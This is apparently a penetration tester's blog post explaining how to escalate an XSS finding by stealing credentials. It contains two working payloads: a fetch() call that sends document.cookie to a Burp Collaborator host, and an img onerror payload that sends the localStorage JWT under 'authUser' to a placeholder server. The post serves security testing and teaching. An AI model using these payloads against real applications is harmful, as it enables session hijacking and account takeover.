Rajan Kumbhani
Aug 14, 2023
•
3 Min
Hello readers! In this blog post, I'm going to discuss an issue I faced during one of my pentesting activities. The web application was vulnerable to XSS, but I was unable to demonstrate a meaningful impact because the application was not using a traditional cookie-based session mechanism. So, in this case, a normal proof-of-concept payload like <script>alert(document.cookie)</script> had nothing to show: there was no session cookie to grab.
Steal cookie through XSS:
An alert box only proves that the injected script runs; to actually steal cookies we need to send them from the victim's browser to a server we control. Normally, document.cookie gives you every cookie that JavaScript is allowed to read (cookies flagged HttpOnly are not exposed to it, so they cannot be stolen this way). Here we can use Burp Collaborator as the cookie-collecting server.
You can use fetch() to send the cookies from the victim's browser to the Collaborator host, e.g.:
<script>fetch('http://<burp collaborator>?cookie='+document.cookie)</script>
The browser sends the request even though the cross-origin response cannot be read, which is all we need: the cookie value appears in the Collaborator interaction log. If the cookie string contains characters such as ; or =, wrap it in encodeURIComponent() so they survive the query string intact.
Steal a JWT token through XSS:
Many modern web applications no longer rely on a session cookie to identify the user. They use a JWT that client-side JavaScript stores and attaches to requests itself, so document.cookie returns nothing useful. So let's look at how to grab a JWT token from the victim's browser.
First, determine where the JWT token is stored in the browser. In my case, the JWT token was stored in local storage. So what can I do if document.cookie is not an option? The Web Storage API (window.localStorage) exposes the methods clear(), getItem(), key(), removeItem() and setItem(), plus the length property.
So I looked into what I could do with this API to escalate from a simple popup to token-grabbing XSS, and found that the injected script can read local storage through the DOM just as easily as it reads cookies: localStorage.getItem(key) returns the value stored under that key.
Now it's time to craft the payload using getItem() with the key that holds the token:
<img src=x onerror=this.src='<server name>/?'+localStorage.getItem('authUser');>
As shown in the screenshot below, the token is stored in local storage under the authUser key.
The web application was vulnerable to XSS but used a JWT rather than a session cookie, so instead of document.cookie I used localStorage.getItem('authUser'). Here localStorage is the storage object I read from, and 'authUser' is the key under which the JWT token was stored.
After entering the payload in the web application, I was able to successfully grab the JWT token.
Don't restrict yourself to document.cookie when you come across a similar XSS-vulnerable application during a pentest. For a bigger impact, explore the other JavaScript APIs available to the injected script, such as localStorage and sessionStorage.